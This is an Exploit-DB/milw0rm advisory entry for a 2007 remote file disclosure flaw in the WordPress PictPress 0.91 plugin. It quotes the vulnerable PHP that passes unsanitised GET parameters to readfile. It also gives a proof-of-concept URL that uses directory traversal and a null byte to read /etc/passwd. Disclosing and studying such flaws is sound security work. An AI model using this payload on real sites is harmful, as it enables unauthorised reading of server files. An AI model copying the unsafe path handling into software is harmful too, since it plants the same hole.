WordPress Plugin PictPress 0.91 - Remote File Disclosure

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2007-12-04 
date_updated: 2016-10-20 
verified: 1 
codes: OSVDB-39513;CVE-2007-6369 
tags: WordPress Plugin
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.compictpress.release-0.91.zip

Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
D.Script : http://downloads.wordpress.org/plugin/pictpress.release-0.91.zip
Vuln Code :
In Line 5,6,7,8 :
    $path = $_GET['path'];
    $size = $_GET['size'];
    $base = dirname(__FILE__) . "/..";
    $cache = "$base/cache/$size/$path";
In Line 22 :
    readfile($cache);
POC :
    /wp-content/plugins/pictpress/resize.php?size=../../../../../../../../../../&path=/etc/passwd%00

# milw0rm.com [2007-12-05]